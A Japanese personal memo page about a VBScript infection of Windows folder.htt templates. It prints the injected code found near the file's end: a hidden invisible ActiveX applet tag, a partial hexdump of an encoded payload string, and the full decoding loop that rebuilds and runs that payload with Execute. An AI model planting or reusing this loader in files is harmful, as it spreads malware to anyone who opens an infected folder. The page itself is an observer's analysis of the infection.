僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
folder.htt(web表示テンプレート)によく感染するようだ。感染した
folder.httのあるフォルダを開くたびに他のフォルダにも火の粉が舞うのだ
ろうか。
普通のfolder.httの末尾近くに、
<script language=vbscript> document.write "<div style='position:absolute; \ left:0px; top:0px; width:0px; height:0px; z-index:28; \ visibility: hidden'><"&"APPLET NAME=KJ"&\ "_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active" &"XComponent></APPLET></div>" </script> <script language=vbscript>
なのが割り込んでいて、その後ろに凶悪そうなバイナリが一行。
$ head -n87 folder.htt | \ tail -n1 | \ hexdump -c | \ head -n15 0000000 E x e S t r i n g = " B b l 0000010 030 G g V ` c k d $ F m l d R ^ w 0000020 l * O a k R ^ w l * = d _ p ^ d 0000030 K g ` m $ ? i o d c H a b c \ s 0000040 $ D L N $ U l R ` c e k $ U b m 0000050 H _ m g $ Q n a = * ? h f _ e x 0000060 < g l j 024 033 L t Z 036 D I W q m ` 0000070 j r ! ( 024 033 D I K c m C a k ! ( 0000080 024 033 D I ; p ^ ` l c F h d g ^ t 0000090 ' 025 034 C H E h c c B s ' 025 034
の後に、
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = \
8"&vbCrLf&"KeyArr(1) = 2"&vbCrLf&"KeyArr(2) = \
7"&vbCrLf&"KeyArr(3) = 1"&vbCrLf& "For i=1 \
To Len(ExeString)"&vbCrLf&"TempNum = \
Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 \
Then"&vbCrLf&"TempNum = 34"&vbCrLf&"\
End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"\
&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = \
vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"\
TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"\
ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>
</BODY>
</HTML>
VBでも遊んでみようか(違
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。